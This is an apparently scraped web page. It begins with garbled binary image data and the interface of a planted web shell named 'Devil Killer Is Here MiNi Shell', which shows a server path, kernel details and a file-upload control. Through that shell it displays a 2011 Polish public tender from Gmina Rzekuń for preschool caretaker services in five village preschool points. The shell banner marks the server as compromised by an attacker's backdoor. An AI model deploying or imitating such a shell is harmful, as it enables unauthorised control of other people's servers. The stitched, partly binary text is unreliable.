JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111110/374194-N-2011.html

<p class="kh_header"><b>Rzekuń: Świadczenie usług pełnienia funkcji opiekunów wychowania przedszkolnego dla dzieci w wieku od 3 do 5 lat w punktach przedszkolnych prowadzonych przez Gminę Rzekuń
w ramach projektu Punkty Przedszkolne w Gminie Rzekuń współfinansowanego przez  Unię Europejską ze środków Europejskiego Funduszu Społecznego  
z Programu Operacyjnego Kapitał Ludzki 2007-2013.</b><br>
<b>Numer ogłoszenia: 374194 - 2011; data zamieszczenia: 10.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rzekuń , ul. Kościuszki 33, 07-411 Rzekuń, woj. mazowieckie, tel. 029 7617301 w. 47, faks 029 7617302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzekun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pełnienia funkcji opiekunów wychowania przedszkolnego dla dzieci w wieku od 3 do 5 lat w punktach przedszkolnych prowadzonych przez Gminę Rzekuń
w ramach projektu Punkty Przedszkolne w Gminie Rzekuń współfinansowanego przez  Unię Europejską ze środków Europejskiego Funduszu Społecznego  
z Programu Operacyjnego Kapitał Ludzki 2007-2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji opiekunów dla  dzieci w wieku       od  3  do 5  lat objętych wychowaniem przedszkolnym w jednym z pięciu punktów przedszkolnych znajdujących się przy szkołach podstawowych w miejscowościach: Borawe, Dzbenin, Drwęcz, Ołdaki, Laskowiec w Gminie Rzekuń w wymiarze 820 godzin  w  jednym  punkcie  przedszkolnym w  ramach  każdej  z pięciu części zamówienia. Projekt,  w  ramach  którego  prowadzone  są  punkty  przedszkolne,  realizowany  jest  przez  Gminę Rzekuń w ramach Programu Operacyjnego Kapitał Ludzki, Poddziałanie 9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej i jest  współfinansowany ze środków Europejskiego Funduszu Społecznego. Celem głównym projektu jest wzrost upowszechnienia edukacji przedszkolnej dzieci w wieku od 3 do 5 lat na obszarach wiejskich w Gminie Rzekuń w czasie od 01.12.2011r. do 31.08.2012r.
1. Wykonawca  zobowiązany  jest  w  ramach  każdej  z  części  od  I  do  V do  realizacji następujących czynności:  
-opieka nad Beneficjentem Ostatecznym (BO)  - dzieci  w wieku 3- 5 lat, w okresie od 01.12.2011 r. do 31.08.2012 r. przez pięć dni w tygodniu po pięć godzin dziennie.
- zapewnienie bezpieczeństwa powierzonych BO - dzieci,
-wzięcia udziału w 8 h. szkoleniu dotyczącym równości kobiet i mężczyzn zorganizowanym przez Gminę Rzekuń w ramach prowadzonego projektu,
-utrzymanie porządku pomieszczeń przeznaczonych na realizację zaplanowanych działań w projekcie skierowanym bezpośrednio do BO-dzieci,
-współpraca z nauczycielem w sprawowaniu opieki na dziećmi w punkcie przedszkolnym, 
-usługa będzie świadczona w jednym z pięciu punktów przedszkolnych prowadzonych w ramach projektu oraz w innych miejscach wskazanych przez Koordynatora projektu,
-współpraca z  Koordynatorem w zakresie realizacji Projektu (bieżące kontakty),
2.Wymagania szczegółowe związane z realizacją przedmiotu zamówienia: 
1)Wykonawca jest zobowiązany do samodzielnego wykonywania zadań objętych zamówieniem.  
2) Ze  względu  na  specyfikę  przedmiotu  zamówienia  Wykonawca  nie  może  powierzyć  zadań  objętych zamówieniem podwykonawcom. 
3) Wykonawcę  bezwzględnie  obowiązuje  należyta  staranność  oraz  dyskrecja     w  wykonywaniu przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8, 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków dokonana zostanie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w rozdziale VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Uprawnienia do wykonywania działalności:od Wykonawcy (oferującego prace w charakterze opiekuna do dzieci w punkcie przedszkolnym) mającego sprawować funkcję opiekuna Zamawiający wymaga:
-wykształcenie-minimum zawodowe.
Ocena spełnienia warunków zostanie dokonana na zasadzie spełnia-nie spełnia, na podstawie załączonych do oferty dokumentów.
Od Wykonawcy mającego sprawować funkcję opiekuna do dzieci Zamawiający wymaga, aby wykazał się doświadczeniem pracy w pokrewnych zajęciach- min. 3 m-ce. Wykonawcy przedłożą w ofercie wykaz sprawowanych funkcji w zakresie niezbędnym do wykazania spełnienia warunku doświadczenia z podaniem ich rodzaju, daty zatrudnienia i miejsca wykonywania oraz załączeniem dokumentu potwierdzającego jego wykonanie tj. np. referencji lub inny dokument w przypadku braku takich referencji Zamawiający dopuszcza przedłożenie oświadczenia Wykonawcy o przebytej pracy z dziećmi.  
Ocena spełnienia warunków zostanie dokonana na zasadzie spełnia-nie spełnia, na podstawie załączonych do oferty dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków dokonana zostanie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych       w rozdziale VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków dokonana zostanie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w rozdziale VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków dokonana zostanie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w rozdziale VI SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy i określa następujące warunki takich zmian: -zmianie terminu rozpoczęcia realizacji zamówienia z przyczyn niezależnych od Zamawiającego jak również Wykonawcy, -nagłej i znacznej rezygnacji uczestników projektu. -zmiany podstawowego personelu Wykonawcy. Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, jednocześnie nie stanowią one zobowiązania Zamawiającego na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rzekun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Rzekuniu ul. Kościuszki 33 07-411 Rzekuń pokój nr 22..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2011 godzina 13:00, miejsce: Urząd Gminy w Rzekuniu ul. Kościuszki 33 07-411 Rzekuń pokój nr 22..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt w ramach którego prowadzone są punkty przedszkolne, realizowany jest przez Gminę Rzekuń w ramach Programu Operacyjnego Kapitał Ludzki, Poddziałanie 9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej i jest współfinansowany ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług pełnienia funkcji opiekuna w punkcie przedszkolnym przy Szkole Podstawowej w Borawem w gminie Rzekuń...</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji opiekuna dla  dzieci w wieku          od  3  do 5  lat objętych wychowaniem przedszkolnym w jednym z pięciu punktów przedszkolnych znajdujących się przy szkołach podstawowych w miejscowościach: Borawe, Dzbenin, Drwęcz, Ołdaki, Laskowiec w Gminie Rzekuń w wymiarze 820 godzin  w  jednym  punkcie  przedszkolnym w  ramach  każdej  z pięciu części zamówienia. Projekt,  w  ramach  którego  prowadzone  są  punkty  przedszkolne,  realizowany  jest  przez  Gminę Rzekuń w ramach Programu Operacyjnego Kapitał Ludzki, Poddziałanie 9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej i jest  współfinansowany ze środków Europejskiego Funduszu Społecznego. Celem głównym projektu jest wzrost upowszechnienia edukacji przedszkolnej dzieci w wieku od 3 do 5 lat na obszarach wiejskich w Gminie Rzekuń w czasie od 01.12.2011r. do 31.08.2012r.
1. Wykonawca  zobowiązany  jest  w  ramach  każdej  z  części  od  I  do  V do  realizacji następujących czynności:  
-opieka nad Beneficjentem Ostatecznym (BO)  - dzieci  w wieku 3- 5 lat, w okresie od 01.12.2011 r. do 31.08.2012 r. przez pięć dni w tygodniu po pięć godzin dziennie.
- zapewnienie bezpieczeństwa powierzonych BO - dzieci,
-wzięcia udziału w 8 h. szkoleniu dotyczącym równości kobiet i mężczyzn zorganizowanym przez Gminę Rzekuń w ramach prowadzonego projektu,
-utrzymanie porządku pomieszczeń przeznaczonych na realizację zaplanowanych działań w projekcie skierowanym bezpośrednio do BO-dzieci,
-współpraca z nauczycielem w sprawowaniu opieki na dziećmi w punkcie przedszkolnym, 
-usługa będzie świadczona w jednym z pięciu punktów przedszkolnych prowadzonych                   w ramach projektu oraz w innych miejscach wskazanych przez Koordynatora projektu,
-współpraca z  Koordynatorem w zakresie realizacji Projektu (bieżące kontakty),
2.Wymagania szczegółowe związane z realizacją przedmiotu zamówienia: 

1)	Wykonawca jest zobowiązany do samodzielnego wykonywania zadań objętych zamówieniem.  
2) Ze  względu  na  specyfikę  przedmiotu  zamówienia  Wykonawca  nie  może  powierzyć  zadań  objętych zamówieniem podwykonawcom. 
3) Wykonawcę  bezwzględnie  obowiązuje  należyta  staranność  oraz  dyskrecja     w  wykonywaniu przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług pełnienia funkcji opiekuna w punkcie przedszkolnym przy Szkole Podstawowej w Drwęczy w gminie Rzekuń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji opiekuna dla  dzieci w wiekuod  3  do 5  lat objętych wychowaniem przedszkolnym w jednym z pięciu punktów przedszkolnych znajdujących się przy szkołach podstawowych w miejscowościach: Borawe, Dzbenin, Drwęcz, Ołdaki, Laskowiec w Gminie Rzekuń w wymiarze 820 godzin  w  jednym  punkcie  przedszkolnym w  ramach  każdej  z pięciu części zamówienia. Projekt,  w  ramach  którego  prowadzone  są  punkty  przedszkolne,  realizowany  jest  przez  Gminę Rzekuń w ramach Programu Operacyjnego Kapitał Ludzki, Poddziałanie 9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej i jest  współfinansowany ze środków Europejskiego Funduszu Społecznego. Celem głównym projektu jest wzrost upowszechnienia edukacji przedszkolnej dzieci w wieku od 3 do 5 lat na obszarach wiejskich w Gminie Rzekuń w czasie od 01.12.2011r. do 31.08.2012r.
1. Wykonawca  zobowiązany  jest  w  ramach  każdej  z  części  od  I  do  V do  realizacji następujących czynności:  
-opieka nad Beneficjentem Ostatecznym (BO)  - dzieci  w wieku 3- 5 lat, w okresie od 01.12.2011 r. do 31.08.2012 r. przez pięć dni w tygodniu po pięć godzin dziennie.
- zapewnienie bezpieczeństwa powierzonych BO - dzieci,
-wzięcia udziału w 8 h. szkoleniu dotyczącym równości kobiet i mężczyzn zorganizowanym przez Gminę Rzekuń w ramach prowadzonego projektu,
-utrzymanie porządku pomieszczeń przeznaczonych na realizację zaplanowanych działań w projekcie skierowanym bezpośrednio do BO-dzieci,
-współpraca z nauczycielem w sprawowaniu opieki na dziećmi w punkcie przedszkolnym, 
-usługa będzie świadczona w jednym z pięciu punktów przedszkolnych prowadzonych w ramach projektu oraz w innych miejscach wskazanych przez Koordynatora projektu,
-współpraca z  Koordynatorem w zakresie realizacji Projektu (bieżące kontakty),
2.Wymagania szczegółowe związane z realizacją przedmiotu zamówienia: 
1)Wykonawca jest zobowiązany do samodzielnego wykonywania zadań objętych zamówieniem.  
2) Ze  względu  na  specyfikę  przedmiotu  zamówienia  Wykonawca  nie  może  powierzyć  zadań  objętych zamówieniem podwykonawcom. 
3) Wykonawcę  bezwzględnie  obowiązuje  należyta  staranność  oraz  dyskrecja      w  wykonywaniu przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usług pełnienia funkcji opiekuna w punkcie przedszkolnym przy Szkole Podstawowej w Dzbeninie w gminie Rzekuń..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji opiekunów dla  dzieci w wieku od  3  do 5  lat objętych wychowaniem przedszkolnym w jednym z pięciu punktów przedszkolnych znajdujących się przy szkołach podstawowych w miejscowościach: Borawe, Dzbenin, Drwęcz, Ołdaki, Laskowiec w Gminie Rzekuń w wymiarze 820 godzin  w  jednym  punkcie  przedszkolnym w  ramach  każdej  z pięciu części zamówienia. Projekt,  w  ramach  którego  prowadzone  są  punkty  przedszkolne,  realizowany  jest  przez  Gminę Rzekuń w ramach Programu Operacyjnego Kapitał Ludzki, Poddziałanie 9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej i jest  współfinansowany ze środków Europejskiego Funduszu Społecznego. Celem głównym projektu jest wzrost upowszechnienia edukacji przedszkolnej dzieci w wieku od 3 do 5 lat na obszarach wiejskich w Gminie Rzekuń w czasie od 01.12.2011r. do 31.08.2012r.
1. Wykonawca  zobowiązany  jest  w  ramach  każdej  z  części  od  I  do  V do  realizacji następujących czynności:  
-opieka nad Beneficjentem Ostatecznym (BO)  - dzieci  w wieku 3- 5 lat, w okresie od 01.12.2011 r. do 31.08.2012 r. przez pięć dni w tygodniu po pięć godzin dziennie.
- zapewnienie bezpieczeństwa powierzonych BO - dzieci,
-wzięcia udziału w 8 h. szkoleniu dotyczącym równości kobiet i mężczyzn zorganizowanym przez Gminę Rzekuń w ramach prowadzonego projektu,
-utrzymanie porządku pomieszczeń przeznaczonych na realizację zaplanowanych działań w projekcie skierowanym bezpośrednio do BO-dzieci,
-współpraca z nauczycielem w sprawowaniu opieki na dziećmi w punkcie przedszkolnym, 
-usługa będzie świadczona w jednym z pięciu punktów przedszkolnych prowadzonych                   w ramach projektu oraz w innych miejscach wskazanych przez Koordynatora projektu,
-współpraca z  Koordynatorem w zakresie realizacji Projektu (bieżące kontakty),
2.Wymagania szczegółowe związane z realizacją przedmiotu zamówienia: 
1)Wykonawca jest zobowiązany do samodzielnego wykonywania zadań objętych zamówieniem.  
2) Ze  względu  na  specyfikę  przedmiotu  zamówienia  Wykonawca  nie  może  powierzyć  zadań  objętych zamówieniem podwykonawcom. 
3) Wykonawcę  bezwzględnie  obowiązuje  należyta  staranność  oraz  dyskrecja      w  wykonywaniu przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
